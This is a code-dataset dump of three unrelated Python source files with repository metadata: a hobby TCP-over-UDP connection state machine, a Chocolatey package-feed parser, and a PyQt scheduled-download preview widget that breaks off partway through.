'seq_no' : self.seq_no,\r\n 'ack_no' : self.ack_no,\r\n 'offset' : self.offset,\r\n 'reserved' : self.reserved,\r\n 'control' : self.control_bits,\r\n 'window_size' : self.window_size,\r\n 'checksum' : self.checksum,\r\n 'urgent' : self.urgent,\r\n 'options' : self.options,\r\n 'payload' : self.data\r\n })\r\n \r\n @property\r\n def is_syn(self):\r\n return (self.control_bits == ControlBits.SYN)\r\n\r\n @property\r\n def is_syn_ack(self):\r\n return (self.control_bits == (ControlBits.SYN | ControlBits.ACK))\r\n\r\n @property\r\n def is_ack(self):\r\n return (self.control_bits == ControlBits.ACK)\r\n\r\n @property\r\n def is_fin_ack(self):\r\n return (self.control_bits == (ControlBits.ACK | ControlBits.FIN))\r\n\r\n @property\r\n def is_fin(self):\r\n return (self.control_bits == ControlBits.FIN)\r\n\r\n# The connection object is a state machine that takes in packets\r\n# and applies them to the state machine.\r\n\r\nclass Connection:\r\n def __init__(self, sock: socket.socket, state: States):\r\n # the socket associated with this connection\r\n self.sock = sock\r\n # get the source information for this socket\r\n (self.src_addr, self.src_port) = self.sock.getsockname()\r\n # get the source inet\r\n self.src_inet = socket.inet_aton(self.src_addr)\r\n # the state of the connection\r\n self._state = state\r\n # window size - maximum window size for starters\r\n self.window_size = 65535\r\n # maximum segment size\r\n self.mss = 536 # default for ipv4\r\n\r\n def get_state(self):\r\n return self._state\r\n \r\n def set_state(self, value):\r\n logger.info(f'set_state({self.state}): {value}')\r\n self._state = value\r\n\r\n state = property(fget = get_state, fset = set_state)\r\n\r\n def pseudo_ip_header(self, segment_length):\r\n return (\r\n self.src_inet + \r\n self.dst_inet +\r\n b'\\x00\\x04' +\r\n segment_length.to_bytes(2, 'big')\r\n )\r\n\r\n def with_checksum(self, tcp_packet: bytes):\r\n # create the pseudo ip header\r\n ip_header = self.pseudo_ip_header(len(tcp_packet))\r\n # create checksum from the concatenated body parts\r\n tcp_checksum = calc_checksum(ip_header + tcp_packet)\r\n tcp_checksum = socket.htons(tcp_checksum)\r\n # now place the checksum into the packet data\r\n tcp_buffer = bytearray(tcp_packet)\r\n tcp_buffer[16] = (tcp_checksum >> 8) & 0x0f\r\n tcp_buffer[17] = (tcp_checksum & 0x0f)\r\n\r\n return bytes(tcp_buffer)\r\n\r\n def increment_seq_no(self):\r\n self.seq_no = self.seq_no + 1\r\n\r\n def syn(self):\r\n # set the TCP header fields for the SYN packet\r\n return self.with_checksum(\r\n struct.pack(\r\n \"!HHIIBBHHHBBH\",\r\n self.src_port, # 16-bits\r\n self.dst_port, # 16-bits\r\n self.seq_no, # 32-bits\r\n self.ack_no, # 32-bits\r\n 5 << 4, # 8-bits, offset + reserved\r\n int(ControlBits.SYN), # 8-bits, control bits (SYN)\r\n self.window_size, # 16-bits window size\r\n 0, # 16-bits, checksum (should be set to zero)\r\n 0, # 16-bits, urgent pointer (should be set to zero)\r\n 2, # option-kind (maximum segment size)\r\n 4, # option-length\r\n self.mss, # maximum segment size\r\n )\r\n )\r\n \r\n def syn_ack(self):\r\n # set the TCP header fields for the SYN packet\r\n return self.with_checksum(\r\n struct.pack(\r\n \"!HHIIBBHHHBBH\",\r\n self.src_port,\r\n self.dst_port,\r\n self.seq_no,\r\n self.ack_no,\r\n 5 << 4,\r\n int(ControlBits.SYN | ControlBits.ACK), # 8-bits\r\n self.window_size, # 16-bits window size\r\n 0, # 16-bits, checksum (should be set to zero)\r\n 0, # 16-bits, urgent pointer (should be set to zero) \r\n 2, # option-kind (maximum segment size)\r\n 4, # option-length\r\n self.mss, # maximum segment size\r\n )\r\n )\r\n\r\n def ack(self):\r\n # set the TCP header fields for the SYN packet\r\n return self.with_checksum(\r\n struct.pack(\r\n \"!HHIIBBHHH\",\r\n self.src_port,\r\n self.dst_port,\r\n self.seq_no,\r\n self.ack_no,\r\n 0,\r\n int(ControlBits.ACK), # 8-bits\r\n self.window_size, # 16-bits window size\r\n 0, # 16-bits, checksum (should be set to zero)\r\n 0 # 16-bits, urgent pointer (should be set to zero) \r\n )\r\n )\r\n\r\n def fin(self):\r\n return self.with_checksum(\r\n struct.pack(\r\n \"!HHIIBBHHH\",\r\n self.src_port,\r\n self.dst_port,\r\n self.seq_no,\r\n self.ack_no,\r\n 0,\r\n int(ControlBits.FIN), # 8-bits\r\n self.window_size, # 16-bits window size\r\n 0, # 16-bits, checksum (should be set to zero)\r\n 0 # 16-bits, urgent pointer (should be set to zero) \r\n )\r\n )\r\n\r\n\r\n def fsm_closed(self, packet: Packet):\r\n # The socket is currently closed and not listening. Normally, we should\r\n # not be able to exit this state from an incoming packet.\r\n logger.info(f'fsm_closed({self.state}): packet = {packet}')\r\n\r\n def fsm_listen(self, packet: Packet):\r\n logger.info(f'fsm_listen({self.state}): packet = {packet}')\r\n\r\n # The connection is listening\r\n if packet.is_syn:\r\n # establish our endpoint information\r\n self.dst_addr = packet.addr[0]\r\n self.dst_port = packet.addr[1]\r\n self.dst_inet = socket.inet_aton(self.dst_addr)\r\n # establish our sequence number\r\n self.seq_no = random.randint(0, max_initial_sequence_no)\r\n # set our acknowlegement to their sequence number\r\n self.ack_no = packet.seq_no\r\n # send a syn-ack\r\n self.send_packet(self.syn_ack())\r\n self.state = States.SYN_RECEIVED\r\n else:\r\n logger.warn(f'fsm_listen({self.state}): unexpected')\r\n\r\n # the connection is in SYN_RECEIVED\r\n def fsm_syn_received(self, packet: Packet):\r\n logger.info(f'fsm_syn_received({self.state}): packet = {packet}')\r\n\r\n if packet.is_ack:\r\n self.state = States.ESTABLISHED\r\n elif packet.is_fin:\r\n self.state = States.CLOSING\r\n else:\r\n logger.warn(f'fsm_syn_received({self.state}): unexpected')\r\n\r\n # the connection is in SYN_SENT\r\n def fsm_syn_sent(self, packet: Packet):\r\n logger.info(f'fsm_syn_sent({self.state}): packet = {packet}')\r\n if packet.is_syn_ack:\r\n self.state = States.ESTABLISHED\r\n #\r\n self.ack_no = packet.seq_no\r\n # send an ack\r\n self.send_packet(self.ack())\r\n self.states = States.ESTABLISHED\r\n else:\r\n logger.warn(f'fsm_syn_sent({self.state}): unexpected')\r\n\r\n def fsm_established(self, packet: Packet):\r\n logger.info(f'fsm_established({self.state}): packet = {packet}')\r\n if packet.is_fin:\r\n self.send_packet(self.ack())\r\n self.state = States.CLOSE_WAIT\r\n else:\r\n logger.warn(f'fsm_established({self.state}): unexpected')\r\n\r\n\r\n\r\n def fsm_fin_wait_1(self, packet: Packet):\r\n logger.info(f'fsm_fin_wait_1({self.state}): packet = {packet}')\r\n if packet.is_fin_ack:\r\n self.send_packet(self.ack())\r\n self.state = States.TIME_WAIT\r\n elif packet.is_fin:\r\n self.send_packet(self.ack())\r\n self.state = States.CLOSING\r\n elif packet.is_ack:\r\n self.state = States.FIN_WAIT_2\r\n else:\r\n logger.warn(f'fsm_fin_wait_1({self.state}): unexpected')\r\n\r\n\r\n def fsm_fin_wait_2(self, packet: Packet):\r\n logger.info(f'fsm_fin_wait_2({self.state}): packet = {packet}')\r\n if packet.is_fin:\r\n self.send_packet(self.ack())\r\n self.state = States.TIME_WAIT\r\n else:\r\n logger.warn(f'fsm_fin_wait_2({self.state}): unexpected')\r\n\r\n\r\n def fsm_closing(self, packet: Packet):\r\n logger.info(f'fsm_closing({self.state}): packet = {packet}')\r\n if packet.is_ack:\r\n self.state = States.TIME_WAIT\r\n else:\r\n logger.warn(f'fsm_closing({self.state}): unexpected')\r\n\r\n\r\n # Receives and processes a packet. The processing of a packet examines the\r\n # current state of the 'state machine' and determines how the packet should\r\n # be processed.\r\n\r\n async def recv_packet(self, packet: Packet):\r\n logger.info(f'recv_packet({self.state}): {self.src_addr}:{self.src_port} => {packet}')\r\n\r\n try:\r\n # handles an incoming packet from the parent handler\r\n if self.state == States.CLOSED:\r\n self.fsm_closed(packet)\r\n elif self.state == States.LISTEN:\r\n self.fsm_listen(packet)\r\n elif self.state == States.SYN_RECEIVED:\r\n self.fsm_syn_received(packet)\r\n elif self.state == States.SYN_SENT:\r\n self.fsm_syn_sent(packet)\r\n elif self.state == States.ESTABLISHED:\r\n self.fsm_established(packet)\r\n elif self.state == States.CLOSING:\r\n self.fsm_closing(packet)\r\n elif self.state == States.CLOSE_WAIT:\r\n self.fsm_close_wait(packet)\r\n elif self.state == States.LAST_ACK:\r\n self.fsm_last_ack(packet)\r\n elif self.state == States.FIN_WAIT_1:\r\n self.fsm_fin_wait_1(packet)\r\n elif self.state == States.FIN_WAIT_2:\r\n self.fsm_fin_wait_2(packet)\r\n elif self.state == States.TIME_WAIT:\r\n self.fsm_fin_time_wait(packet)\r\n finally:\r\n logger.info(f'recv_packet({self.state}): finished')\r\n\r\n # Sends a packet to the remote end. This method does not change state, please\r\n # handle that elsewhere.\r\n\r\n def send_packet(self, message: bytes, increment_seq_no: bool = True):\r\n logger.info(f'send_packet({self.state}): {message}')\r\n self.sock.sendto(message, (self.dst_addr, self.dst_port))\r\n if increment_seq_no:\r\n self.seq_no += 1\r\n\r\n # wait for the next packet\r\n\r\n async def wait_packet(self):\r\n # receive the raw wire message\r\n (data, addr) = self.sock.recvfrom(4096)\r\n # decode into a packet\r\n packet = Packet(data, addr)\r\n # check the header against the incoming source\r\n if (packet.src_port != addr[1]):\r\n # protocol spoofing\r\n raise ValueError(f'Protocol spoofing, source port {packet.src_port} <> {addr[1]}')\r\n\r\n return packet\r\n\r\n # wait for one cycle in the state machine\r\n\r\n async def wait_one(self):\r\n logger.info(f'wait_one({self.state}): starting')\r\n\r\n try:\r\n while True:\r\n try:\r\n # wait for a packet\r\n packet = await self.wait_packet()\r\n # if there is no packet keep waiting\r\n if packet is None:\r\n continue\r\n # receive the packet into the state machine\r\n await self.recv_packet(packet)\r\n # return if there is no exception\r\n return\r\n except socket.timeout:\r\n pass\r\n finally:\r\n logger.info(f'wait_one({self.state}): finished')\r\n\r\n # wait until one of the target states is achieved\r\n\r\n async def wait_until(self, states):\r\n while True:\r\n if (self.state in states):\r\n return\r\n\r\n await self.wait_one()\r\n\r\n # Starts a connection with the remote end. Sends a SYN packet and sets the\r\n # connection state to SYN_SENT.\r\n\r\n async def connect(self, dst_addr: str, dst_port: int):\r\n logger.info(f'connect({self.state}): start')\r\n\r\n try:\r\n self.dst_addr = socket.gethostbyname(dst_addr)\r\n self.dst_port = dst_port\r\n self.dst_inet = socket.inet_aton(self.dst_addr)\r\n # create a sequence number\r\n self.seq_no = random.randint(0, max_initial_sequence_no)\r\n # set the ack number\r\n self.ack_no = 0\r\n # create a SYN packet to send to the client\r\n self.send_packet(self.syn())\r\n self.state = States.SYN_SENT\r\n # process incoming messages until we reach the\r\n # established state or a terminal state\r\n await self.wait_until((States.ESTABLISHED, States.CLOSED))\r\n finally:\r\n logger.info(f'connect({self.state}): finished')\r\n\r\n # Sends a \"message\" (do not confuse with send packet)\r\n \r\n def send_message(self, message: bytes):\r\n # verify that the connection is in a valid state\r\n assert(self.state == States.ESTABLISHED)\r\n # send the message\r\n # TBD\r\n\r\n # Closes the connection\r\n\r\n async def close(self):\r\n # if the connection is already terminating\r\n if (self.state in (States.CLOSED, States.CLOSING, States.CLOSE_WAIT, States.FIN_WAIT_1, States.FIN_WAIT_2, States.TIME_WAIT)):\r\n return\r\n elif (self.state in (States.SYN_RECEIVED, States.ESTABLISHED)):\r\n self.send_packet(self.fin())\r\n self.state = States.FIN_WAIT_1\r\n await self.wait_until((States.CLOSED,))\r\n elif (self.state == States.SYN_SENT):\r\n self.state = States.CLOSED\r\n elif (self.state == States.LISTEN):\r\n self.state = States.CLOSED\r\n else:\r\n logger.warn(f'close(): Unhandled state transition: state = {self.state}')\r\n\r\n\r\nclass RUDPClient(socket.socket):\r\n def __init__(self):\r\n self.connection = None\r\n\r\n async def send_message(self, message: bytes):\r\n assert(self.connection is not None)\r\n self.connection.send_message(bytes)\r\n\r\n async def close(self):\r\n assert(self.connection is not None)\r\n await self.connection.close()\r\n\r\n async def connect(self, host: str, port: int):\r\n # create the socket (for communication)\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\r\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n # bind the local address (random port) for return messages\r\n self.sock.bind(('', 0))\r\n # set the socket timeout so that we do not block indefinitely\r\n self.sock.settimeout(1.0)\r\n # bind it to a connection\r\n self.connection = Connection(self.sock, States.CLOSED)\r\n # establish the connection\r\n await self.connection.connect(host, port)\r\n # return the connection\r\n return self.connection\r\n\r\n# The reliable udp server is a multiplexing listening entity. It creates a socket for handling\r\n# incoming requests and creates 'connections' (state machines) in response to inbound requests.\r\n# In practice, you would want to limit these in the way that listen() and accept() do, but for\r\n# this exercise, the connection are effectively unbound.\r\n\r\nclass RUDPServer:\r\n def __init__(self):\r\n self.connections = {}\r\n\r\n async def listen(self, port: int):\r\n self.host = '127.0.0.1' # temporary\r\n self.port = port\r\n logger.info(f'listen(): port = {port}')\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n logger.info(f'listen(): socket = {self.sock}')\r\n self.sock.bind((self.host, self.port))\r\n # set the socket timeout so that we do not block indefinitely\r\n self.sock.settimeout(1.0)\r\n logger.info('listen(): socket bound')\r\n \r\n async def recv_packet(self):\r\n \"\"\"Waits for a single packet to arrive\"\"\"\r\n try:\r\n # receive the raw wire message\r\n (data, addr) = self.sock.recvfrom(4096)\r\n # decode into a packet\r\n packet = Packet(data, addr)\r\n # check the header against the incoming source\r\n if (packet.src_port != addr[1]):\r\n # protocol spoofing\r\n raise ValueError(f'Protocol spoofing, source port {packet.src_port} <> {addr[1]}')\r\n\r\n return packet\r\n except socket.timeout:\r\n #logger.warn('timeout exception on socket')\r\n pass\r\n\r\n async def dispatch(self):\r\n # the dispatch method is a state machine for the endpoint\r\n logger.debug('dispatch(): starting')\r\n\r\n # handle the next incoming packet\r\n while True:\r\n packet = await self.recv_packet()\r\n if packet is None:\r\n continue\r\n\r\n # now at this point we have received a packet but we are multiplexing\r\n # many different psuedo connections... moreover, this packet may belong\r\n # to one or it may not belong to any connection. we need to determine\r\n # where this connection belongs.\r\n connection = self.connections.get(packet.addr)\r\n if connection is None:\r\n logger.info(f'dispatch(): new connection for {packet.addr}')\r\n # create the connection (state machine)\r\n self.connections[packet.addr] = connection = Connection(self.sock, States.LISTEN) \r\n\r\n await connection.recv_packet(packet)\r\n", "repo_name": "ajaxx/tcp-over-udp", "sub_path": "reliable_udp.py", "file_name": "reliable_udp.py", "file_ext": "py", "file_size_in_byte": 20815, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "enum.IntEnum", "line_number": 15, "usage_type": "name"}, {"api_name": "enum.IntEnum", "line_number": 25, "usage_type": "name"}, {"api_name": "struct.unpack", "line_number": 50, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 82, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 136, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 136, "usage_type": "name"}, {"api_name": "socket.inet_aton", "line_number": 142, "usage_type": "call"}, {"api_name": "socket.htons", "line_number": 172, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 186, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 206, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 226, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 242, "usage_type": "call"}, {"api_name": "socket.inet_aton", "line_number": 270, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.States.SYN_RECEIVED", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 277, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 286, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 286, "usage_type": "name"}, {"api_name": "utils.States.CLOSING", "line_number": 288, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 288, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 296, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 296, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 301, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 301, "usage_type": "name"}, {"api_name": "utils.States.CLOSE_WAIT", "line_number": 309, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 309, "usage_type": "name"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 319, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 319, "usage_type": "name"}, {"api_name": "utils.States.CLOSING", "line_number": 322, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 322, "usage_type": "name"}, {"api_name": "utils.States.FIN_WAIT_2", "line_number": 324, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 324, "usage_type": "name"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 333, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 333, "usage_type": "name"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 341, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 341, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 355, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 355, "usage_type": "name"}, {"api_name": "utils.States.LISTEN", "line_number": 357, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 357, "usage_type": "name"}, {"api_name": "utils.States.SYN_RECEIVED", "line_number": 359, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 359, "usage_type": "name"}, {"api_name": "utils.States.SYN_SENT", "line_number": 361, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 361, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 363, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 363, "usage_type": "name"}, {"api_name": "utils.States.CLOSING", "line_number": 365, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 365, "usage_type": "name"}, {"api_name": "utils.States.CLOSE_WAIT", "line_number": 367, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 367, "usage_type": "name"}, {"api_name": "utils.States.LAST_ACK", "line_number": 369, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 369, "usage_type": "name"}, {"api_name": "utils.States.FIN_WAIT_1", "line_number": 371, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 371, "usage_type": "name"}, {"api_name": "utils.States.FIN_WAIT_2", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 373, "usage_type": "name"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 375, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 375, "usage_type": "name"}, {"api_name": "socket.timeout", "line_number": 420, "usage_type": "attribute"}, {"api_name": "socket.gethostbyname", "line_number": 441, "usage_type": "call"}, {"api_name": "socket.inet_aton", "line_number": 443, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 445, "usage_type": "call"}, {"api_name": "utils.States.SYN_SENT", "line_number": 450, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 450, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 453, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 453, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 453, "usage_type": "attribute"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 461, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 461, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 469, "usage_type": "name"}, {"api_name": "utils.States.CLOSING", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.CLOSE_WAIT", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.FIN_WAIT_1", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.FIN_WAIT_2", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.TIME_WAIT", "line_number": 469, "usage_type": "attribute"}, {"api_name": "utils.States.SYN_RECEIVED", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 471, "usage_type": "name"}, {"api_name": "utils.States.ESTABLISHED", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.States.FIN_WAIT_1", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 473, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 474, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 474, "usage_type": "name"}, {"api_name": "utils.States.SYN_SENT", "line_number": 475, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 475, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 476, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 476, "usage_type": "name"}, {"api_name": "utils.States.LISTEN", "line_number": 477, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 477, "usage_type": "name"}, {"api_name": "utils.States.CLOSED", "line_number": 478, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 478, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 483, "usage_type": "attribute"}, {"api_name": "socket.socket", "line_number": 497, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 497, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 497, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_UDP", "line_number": 497, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 498, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 498, "usage_type": "attribute"}, {"api_name": "utils.States.CLOSED", "line_number": 504, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 504, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 523, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 523, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 523, "usage_type": "attribute"}, {"api_name": "socket.timeout", "line_number": 543, "usage_type": "attribute"}, {"api_name": "utils.States.LISTEN", "line_number": 565, "usage_type": "attribute"}, {"api_name": "utils.States", "line_number": 565, "usage_type": "name"}]}
+{"seq_id": "11127441937", "text": "import os\nimport xml.etree.ElementTree\n\nfrom repology.package import Package\n\n\nclass ChocolateyParser():\n def __init__(self):\n pass\n\n def Parse(self, path):\n result = []\n\n for pagepath in os.listdir(path):\n if not pagepath.endswith('.xml'):\n continue\n\n root = xml.etree.ElementTree.parse(os.path.join(path, pagepath))\n\n for entry in root.findall('{http://www.w3.org/2005/Atom}entry'):\n pkg = Package()\n pkg.name = entry.find('{http://www.w3.org/2005/Atom}title').text\n pkg.version = entry.find('{http://schemas.microsoft.com/ado/2007/08/dataservices/metadata}properties/{http://schemas.microsoft.com/ado/2007/08/dataservices}Version').text\n pkg.homepage = entry.find('{http://schemas.microsoft.com/ado/2007/08/dataservices/metadata}properties/{http://schemas.microsoft.com/ado/2007/08/dataservices}ProjectUrl').text\n\n commentnode = entry.find('{http://www.w3.org/2005/Atom}summary')\n if commentnode is not None:\n pkg.comment = commentnode.text\n\n result.append(pkg)\n\n return result\n", "repo_name": "roscopecoltran/sniperkit-services", "sub_path": "dockerfiles/vcs/packages/repology/repology/parser/chocolatey.py", "file_name": "chocolatey.py", "file_ext": "py", "file_size_in_byte": 1187, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 14, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.etree.ElementTree.parse", "line_number": 18, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.etree", "line_number": 18, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "repology.package.Package", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "20053147074", "text": "from Core.Ui import *\nfrom Services.Messages import Messages\nfrom Services.Twitch.GQL import TwitchGQLModels\nfrom Download.Downloader.Core.StreamDownloader import StreamDownloader\nfrom Download import ScheduledDownloadPreset\nfrom Ui.Components.Widgets.WidgetRemoveController import WidgetRemoveController\n\nimport uuid\n\n\nclass ScheduledDownloadPreview(QtWidgets.QWidget):\n resizedSignal = QtCore.pyqtSignal()\n\n def __init__(self, scheduledDownloadId: uuid.UUID, parent: QtWidgets.QWidget | None = None):\n super().__init__(parent=parent)\n self.scheduledDownloadId = scheduledDownloadId\n self._downloader: StreamDownloader | None = None\n self._widgetRemoveController = WidgetRemoveController(parent=self)\n self._widgetRemoveController.performRemove.connect(self.removeScheduledDownload)\n self._ui = UiLoader.load(\"scheduledDownloadPreview\", self)\n self._ui.downloadViewControlBar = Utils.setPlaceholder(self._ui.downloadViewControlBar, Ui.DownloadViewControlBar(parent=self))\n self._ui.downloaderView = Utils.setPlaceholder(self._ui.downloaderView, Ui.DownloaderView(parent=self))\n self._ui.downloaderView.resizedSignal.connect(self.resizedSignal, QtCore.Qt.ConnectionType.QueuedConnection)\n self._ui.downloadViewControlBar.openFolderButton.clicked.connect(self.openFolder)\n self._ui.downloadViewControlBar.openFolderButton.setVisible()\n self._ui.downloadViewControlBar.openFileButton.clicked.connect(self.openFile)\n self._ui.downloadViewControlBar.openFileButton.setDisabled()\n self.scheduledDownload = App.ScheduledDownloadManager.get(self.scheduledDownloadId)\n self.scheduledDownload.activeChanged.connect(self._activeChanged)\n self._activeChanged()\n self.scheduledDownload.channelDataUpdateStarted.connect(self._channelDataUpdateStarted)\n self.scheduledDownload.channelDataUpdateFinished.connect(self._channelDataUpdateFinished)\n self.scheduledDownload.channelDataUpdated.connect(self._showChannel)\n self.scheduledDownload.pubSubStateChanged.connect(self._showPubSubState)\n self.scheduledDownload.status.updated.connect(self._statusUpdated)\n self._statusUpdated()\n if self.scheduledDownload.isUpdatingChannelData():\n self._channelDataUpdateStarted()\n else:\n self._channelDataUpdateFinished()\n self._showChannel()\n self._showPubSubState()\n self._ui.networkAlertIcon = Utils.setSvgIcon(self._ui.networkAlertIcon, Icons.ALERT_RED_ICON)\n self._ui.enableButton.clicked.connect(self._enableButtonClicked)\n self._ui.refreshButton.clicked.connect(self.scheduledDownload.updateChannelData)\n self._ui.settingsButton.clicked.connect(self.editScheduledDownload)\n self._ui.deleteButton.clicked.connect(self.tryRemoveScheduledDownload)\n\n def showEvent(self, event: QtGui.QShowEvent) -> None:\n self.resizedSignal.emit()\n super().showEvent(event)\n\n def _activeChanged(self) -> None:\n self._ui.downloaderArea.setEnabled(self.scheduledDownload.isActive())\n self._ui.enableButton.setIcon(QtGui.QIcon(Icons.TOGGLE_ON_ICON if self.scheduledDownload.isEnabled() else Icons.TOGGLE_OFF_ICON))\n\n def _enableButtonClicked(self) -> None:\n if self.scheduledDownload.isActive():\n if self.scheduledDownload.status.isDownloading():\n if not Utils.ask(*Messages.ASK.STOP_DOWNLOAD, parent=self):\n return\n self.scheduledDownload.setEnabled(not self.scheduledDownload.isEnabled())\n\n def _statusUpdated(self) -> None:\n if self.scheduledDownload.status.isNone():\n self._ui.downloaderView.setStatusVisible(False)\n elif self.scheduledDownload.status.isGeneratingPlayback():\n self._ui.downloaderView.showAlert(T(\"preparing\", ellipsis=True))\n self._ui.downloaderView.setStatusVisible(True)\n elif self.scheduledDownload.status.isDownloading():\n self.connectDownloader(self.scheduledDownload.downloader)\n elif self.scheduledDownload.status.isError():\n self._ui.downloaderView.showError(self.scheduledDownload.status.getError())\n self._ui.downloaderView.setStatusVisible(True)\n if isinstance(self.scheduledDownload.status.getError(), ScheduledDownloadPreset.Exceptions.PreferredResolutionNotFound) and App.Preferences.general.isNotifyEnabled():\n App.Instance.notification.toastMessage(\n title=T(\"preferred-resolution-not-found\"),\n message=f\"{T('#Unable to start scheduled download for channel {channel}.', channel=self.scheduledDownload.channel.formattedName)}\\n{T('started-at')}: {self.scheduledDownload.channel.stream.createdAt.toTimeZone(App.Preferences.localization.getTimezone()).toString('yyyy-MM-dd HH:mm:ss')}\",\n icon=App.Instance.notification.Icons.Warning\n )\n elif self.scheduledDownload.status.isDownloaderError():\n self._ui.downloaderView.showError(self.scheduledDownload.status.getError(), downloadAborted=True)\n self._ui.downloaderView.setStatusVisible(True)\n\n def connectDownloader(self, downloader: StreamDownloader) -> None:\n self.disconnectDownloader()\n self._widgetRemoveController.setRemoveEnabled(False)\n self._downloader = downloader\n self._downloader.status.updated.connect(self._handleDownloadStatus)\n self._downloader.finished.connect(self._handleDownloadResult)\n self._handleDownloadStatus()\n self._ui.downloadViewControlBar.showDownloadInfo(self._downloader.downloadInfo)\n self._ui.downloadViewControlBar.openFileButton.setVisible()\n self._ui.downloaderView.connectDownloader(self._downloader)\n\n def disconnectDownloader(self) -> None:\n if self._downloader != None:\n self._ui.downloaderView.disconnectDownloader()\n self._downloader.status.updated.disconnect(self._handleDownloadStatus)\n self._downloader.finished.disconnect(self._handleDownloadResult)\n self._downloader = None\n self._showChannel()\n self._ui.downloadViewControlBar.openFileButton.setDisabled()\n self._widgetRemoveController.setRemoveEnabled(True)\n\n def _handleDownloadStatus(self) -> None:\n if self._downloader.status.terminateState.isInProgress():\n self._ui.enableButton.setEnabled(False)\n self._ui.refreshButton.setEnabled(False)\n\n def _handleDownloadResult(self) -> None:\n if self._downloader.status.terminateState.isTrue():\n self._ui.enableButton.setEnabled(True)\n self._ui.refreshButton.setEnabled(True)\n self.disconnectDownloader()\n\n def _channelDataUpdateStarted(self) -> 